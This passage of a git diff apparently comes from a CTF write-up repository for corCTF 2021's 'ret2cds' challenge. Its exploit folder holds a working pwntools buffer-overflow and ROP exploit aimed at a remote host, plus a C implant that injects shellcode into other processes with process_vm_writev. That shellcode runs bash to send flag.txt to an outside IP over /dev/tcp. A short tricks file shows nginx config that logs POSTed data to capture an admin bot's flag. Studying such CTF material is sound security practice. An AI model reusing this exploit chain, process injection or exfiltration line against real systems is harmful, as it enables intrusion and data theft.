b/2021/corctf/ret2cds/challenge/server/slf4j-api-1.7.2.jar differ diff --git a/2021/corctf/ret2cds/challenge/server/zt-exec-1.12.jar b/2021/corctf/ret2cds/challenge/server/zt-exec-1.12.jar new file mode 100755 index 0000000..d8c6983 Binary files /dev/null and b/2021/corctf/ret2cds/challenge/server/zt-exec-1.12.jar differ diff --git a/2021/corctf/ret2cds/challenge/start.sh b/2021/corctf/ret2cds/challenge/start.sh new file mode 100644 index 0000000..2692cd8 --- /dev/null +++ b/2021/corctf/ret2cds/challenge/start.sh @@ -0,0 +1,3 @@ +#!/bin/sh +cd /home/ret2cds +while true; do java -jar /opt/nc-java/nc-java.jar ./ret2cds 1337; done \ No newline at end of file diff --git a/2021/corctf/ret2cds/exploit/Makefile b/2021/corctf/ret2cds/exploit/Makefile new file mode 100644 index 0000000..9841260 --- /dev/null +++ b/2021/corctf/ret2cds/exploit/Makefile @@ -0,0 +1,16 @@ +.PHONY: all clean copy + +CC=gcc +OBJCOPY=objcopy + +all: implant.bin + +clean: + $(RM) *.bin *.elf + +implant.bin: implant.elf + $(OBJCOPY) -O binary $< $@ + +implant.elf: stage2.c stage2.ld + $(CC) -nostdlib -nodefaultlibs -nostdinc -T stage2.ld -fpic -fno-stack-protector \ + -Os -std=gnu11 -Wall -Wextra -o $@ $< diff --git a/2021/corctf/ret2cds/exploit/exploit.py b/2021/corctf/ret2cds/exploit/exploit.py new file mode 100644 index 0000000..4ec0dfa --- /dev/null +++ b/2021/corctf/ret2cds/exploit/exploit.py @@ -0,0 +1,70 @@ +from pwn import * + +import os + +context.arch = 'amd64' + +def run(): + elf = ELF("../challenge/chall/ret2cds") + rop = ROP(elf) + rop.write(1, elf.got['write']) + print(rop.dump()) + + libc = ELF("../challenge/chall/libc.so.6") + print(hex(libc.symbols['write'])) + + # r = process(["./ld-2.31.so", "./ret2cds"], env={"LD_PRELOAD": os.getcwd() + "/libc.so.6"}) + # gdb.attach(r) + # r = remote("localhost", 1337) + r = remote("ret2cds.be.ax", 34485) + try: + r.recvuntil("warden: ") + + r.sendline(b"A"*256 + b"AAAAAAAA" + rop.chain() + p64(0x0040123a)) + print(r.recvline()) + print(r.recvline()) + leak = r.recvline()[1:8] + leak = u64(leak.ljust(8, b'\x00')) + print(hex(leak)) + + libc_base = leak - libc.symbols['write'] + print(hex(libc_base)) + + libc.address = libc_base + + libc_rop = ROP(libc) + libc_rop.mmap(0x133713370000, 0x10000, 7, 0x32) #, -1, 0) + libc_rop.read(0, 0x133713370000, 0x10000) + print(libc_rop.dump()) + print(libc_rop.chain()) + + # abuse setcontext lol + # setcontext is always a good function to look for cool gadgets in + # loaded as 0x0 + # 001581e1 4c 8b 4a 30 MOV R9,qword ptr [RDX + 0x30] + # 001581e5 48 8b 92 MOV RDX,qword ptr [RDX + 0x88] + # 88 00 00 00 + # 001581ec 31 c0 XOR EAX,EAX + # 001581ee c3 RET + fucky_r9_gadget = p64(0x581e1 + libc_base) + # load rdx with a pointer to rodata (convenient source of 0x0s) offset so that r9 gets + pre_rop = ROP(libc) + pre_rop.rdx = 0x402008 - 0x30 + + r.sendline(b"A"*256 + b"AAAAAAAA" + pre_rop.chain() + fucky_r9_gadget + libc_rop.chain() + p64(0x133713370000)) + + os.system("make") + with open("implant.bin", "rb") as f: + shellcode = f.read() + shellcode += b"\x00" * (0x10000 - len(shellcode)) + + r.send(shellcode) + + # stage3 = asm(shellcraft.amd64.linux.execve("/bin/bash", ["/bin/bash", "-c", "touch /tmp/hax; cat flag.txt > /dev/tcp/44.44.127.10/1337"], {})) + + r.interactive() + finally: + r.close() + +if __name__ == "__main__": + run() diff --git a/2021/corctf/ret2cds/exploit/stage2.c b/2021/corctf/ret2cds/exploit/stage2.c new file mode 100644 index 0000000..abba84b --- /dev/null +++ b/2021/corctf/ret2cds/exploit/stage2.c @@ -0,0 +1,174 @@ +// look ma no stdlib +typedef unsigned char uint8_t; +_Static_assert(sizeof(uint8_t) == 1, "uint8_t wrong size"); +typedef unsigned short uint16_t; +_Static_assert(sizeof(uint16_t) == 2, "uint16_t wrong size"); +typedef unsigned int uint32_t; +_Static_assert(sizeof(uint32_t) == 4, "uint32_t wrong size"); +typedef unsigned long long uint64_t; +_Static_assert(sizeof(uint64_t) == 8, "uint64_t wrong size"); +typedef unsigned int size_t; +typedef int ssize_t; + +#define NULL ((void*)0x0) +#define pid_t unsigned long +#define true 1 +#define false 0 +#define SYS_exit 1 +#define SYS_read 0 +#define SYS_write 1 +#define SYS_process_vm_readv 310 +#define SYS_process_vm_writev 311 + +struct iovec { + void *iov_base; /* Starting address */ + size_t iov_len; /* Number of bytes to transfer */ +}; + +int main(); +void __attribute__((noreturn)) exit(int); + +void* memset(void* dst, int val, size_t size) { + for (size_t i = 0; i < size; i++) { + ((uint8_t*)dst)[i] = val; + } + return dst; +} + +void* memcpy(void* dst, const void* src, size_t size) { + for (size_t i = 0; i < size; i++) { + ((uint8_t*)dst)[i] = ((uint8_t*)src)[i]; + } + return dst; +} + +size_t strlen(const char* s) { + size_t sz = 0; + while(*s) { + s++; + sz++; + } + return sz; +} + +extern uint8_t _bss; +extern uint8_t _ebss; +void __attribute__((noreturn)) __attribute__((section(".text.start"))) _start() { + // wipe .bss + memset(&_bss, 0, (&_ebss) - (&_bss)); + // go to main! + exit(main()); +} + +ssize_t read(int _fd, void* _buf, size_t _len) { + register int fd asm("rdi") = _fd; + register void* buf asm("rsi") = _buf; + register size_t len asm("rdx") = _len; + register int syscall asm("rax") = SYS_read; + register ssize_t ret asm("rax"); + asm volatile("syscall" : "=r"(ret) : "r"(fd), "r"(buf), "r"(len), "r"(syscall) : "memory"); + return ret; +} + +void write(int _fd, const void* _buf, size_t _len) { + register int fd asm("rdi") = _fd; + register const void* buf asm("rsi") = _buf; + register size_t len asm("rdx") = _len; + register int syscall asm("rax") = SYS_write; + asm volatile("syscall" :: "r"(fd), "r"(buf), "r"(len), "r"(syscall) : "memory"); +} + +void __attribute__((noreturn)) exit(int _code) { + register int code asm("rdi") = _code; + register int syscall asm("rax") = SYS_exit; + asm volatile("syscall" :: "r"(code), "r"(syscall) : "memory"); + __builtin_unreachable(); +} + +ssize_t process_vm_readv(pid_t _pid, + const struct iovec *_local_iov, + unsigned long _liovcnt, + const struct iovec *_remote_iov, + unsigned long _riovcnt, + unsigned long _flags) { + register pid_t pid asm("rdi") = _pid; + register struct iovec* local_iov asm("rsi") = _local_iov; + register unsigned long liovcnt asm("rdx") = _liovcnt; + register struct iovec* remote_iov asm("r10") = _remote_iov; + register unsigned long riovcnt asm("r8") = _riovcnt; + register unsigned long flags asm("r9") = _flags; + register int syscall asm("rax") = SYS_process_vm_readv; + register ssize_t ret asm("rax"); + asm volatile("syscall" : "=r"(ret) : "r"(pid), "r"(local_iov), "r"(liovcnt), "r"(remote_iov), + "r"(riovcnt), "r"(flags), "r"(syscall) : "memory"); + return ret; +} + +ssize_t process_vm_writev(pid_t _pid, + const struct iovec *_local_iov, + unsigned long _liovcnt, + const struct iovec *_remote_iov, + unsigned long _riovcnt, + unsigned long _flags) { + register pid_t pid asm("rdi") = _pid; + register struct iovec* local_iov asm("rsi") = _local_iov; + register unsigned long liovcnt asm("rdx") = _liovcnt; + register struct iovec* remote_iov asm("r10") = _remote_iov; + register unsigned long riovcnt asm("r8") = _riovcnt; + register unsigned long flags asm("r9") = _flags; + register int syscall asm("rax") = SYS_process_vm_writev; + register ssize_t ret asm("rax"); + asm volatile("syscall" : "=r"(ret) : "r"(pid), "r"(local_iov), "r"(liovcnt), "r"(remote_iov), + "r"(riovcnt), "r"(flags), "r"(syscall) : "memory"); + return ret; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////// + + +void print(char* s) { + write(1, s, strlen(s)); +} + +const char* hex_chars = "0123456789abcdef"; + +void print_int(unsigned long x) { + char c; + for(int i = 0; i < 64; i+= 4) { + c = hex_chars[(x >> (64 - 4 - i)) & 0xf]; + write(1, &c, 1); + } +} + +// asm(shellcraft.amd64.linux.execve("/bin/bash", ["/bin/bash", "-c", "touch /tmp/hax; cat flag.txt > /dev/tcp/44.44.127.10/1337"], {})) +char* buf = "\x6a\x68\x48\xb8\x2f\x62\x69\x6e\x2f\x62\x61\x73\x50\x48\x89\xe7\x48\xb8\x01\x01\x01\x01\x01\x01\x01\x01\x50\x48\xb8\x31\x2e\x30\x32\x32\x36\x01\x01\x48\x31\x04\x24\x48\xb8\x34\x34\x2e\x31\x32\x37\x2e\x31\x50\x48\xb8\x2f\x74\x63\x70\x2f\x34\x34\x2e\x50\x48\xb8\x74\x20\x3e\x20\x2f\x64\x65\x76\x50\x48\xb8\x20\x66\x6c\x61\x67\x2e\x74\x78\x50\x48\xb8\x68\x61\x78\x3b\x20\x63\x61\x74\x50\x48\xb8\x63\x68\x20\x2f\x74\x6d\x70\x2f\x50\x48\xb8\x01\x01\x01\x01\x01\x01\x01\x01\x50\x48\xb8\x69\x01\x2c\x62\x01\x75\x6e\x74\x48\x31\x04\x24\x48\xb8\x2f\x62\x69\x6e\x2f\x62\x61\x73\x50\x31\xf6\x56\x6a\x15\x5e\x48\x01\xe6\x56\x6a\x1a\x5e\x48\x01\xe6\x56\x6a\x18\x5e\x48\x01\xe6\x56\x48\x89\xe6\x6a\x01\xfe\x0c\x24\x31\xd2\x52\x48\x89\xe2\x6a\x3b\x58\x0f\x05"; +char buf2[0x2000]; + +struct iovec remote_vec = { (void*)0x800000000, 0x2000 }; +struct iovec local_vec = { &buf2[0], 0x2000 }; + +int main() { + print("implant is booted\n"); + + memset(buf2, 0x90, 0x2000); + memcpy(&buf2[0x2000 - 186], buf, 186); + + for (int i = 2; i < 100; i++) { + print("sending to pid:"); + print_int(i); + print("\n"); + ssize_t ret = process_vm_writev(i, &local_vec, 1, &remote_vec, 1, 0); + if (ret <= 0) { + print("bad ret!: "); + print_int(-ret); + print("\n"); + } else { + print("GOOD RET\n"); + break; + } + } + print("injection complete\n"); + while(true){} + return 120; +} + diff --git a/2021/corctf/ret2cds/exploit/stage2.ld b/2021/corctf/ret2cds/exploit/stage2.ld new file mode 100644 index 0000000..d7334d8 --- /dev/null +++ b/2021/corctf/ret2cds/exploit/stage2.ld @@ -0,0 +1,33 @@ +ENTRY(_start) + +MEMORY +{ + RAM (rwx) : ORIGIN = 0x133713370000, LENGTH = 0x10000 +} + +SECTIONS +{ + .text : + { + *(.text.start) + *(.text*) + } + + .rodata : + { + *(.rodata*) + } + + .data : + { + *(.data*) + } + + .bss : + { + _bss = .; + *(.bss*) + *(COMMON) + _ebss = .; + } +} diff --git a/2021/corctf/ret2cds/main.png b/2021/corctf/ret2cds/main.png new file mode 100644 index 0000000..bfc38b6 Binary files /dev/null and b/2021/corctf/ret2cds/main.png differ diff --git a/2021/corctf/tricks.md b/2021/corctf/tricks.md new file mode 100644 index 0000000..b2c2a17 --- /dev/null +++ b/2021/corctf/tricks.md @@ -0,0 +1,22 @@ +# tricks + +## phpme: log all submitted post data with nginx +(to capture a flag POSTed by an adminbot) + +you can avoid having to write any code and use pure nginx config for this lol + +i'm putting this here because i don't wanna write up phpme but this is a cool thing i found out in +the process + +```nginx +log_format postdata $request_body; + +server { + location /flagzone { + access_log /var/log/nginx/flags.log postdata; + echo_read_request_body; + # ... + } + # ... +} +```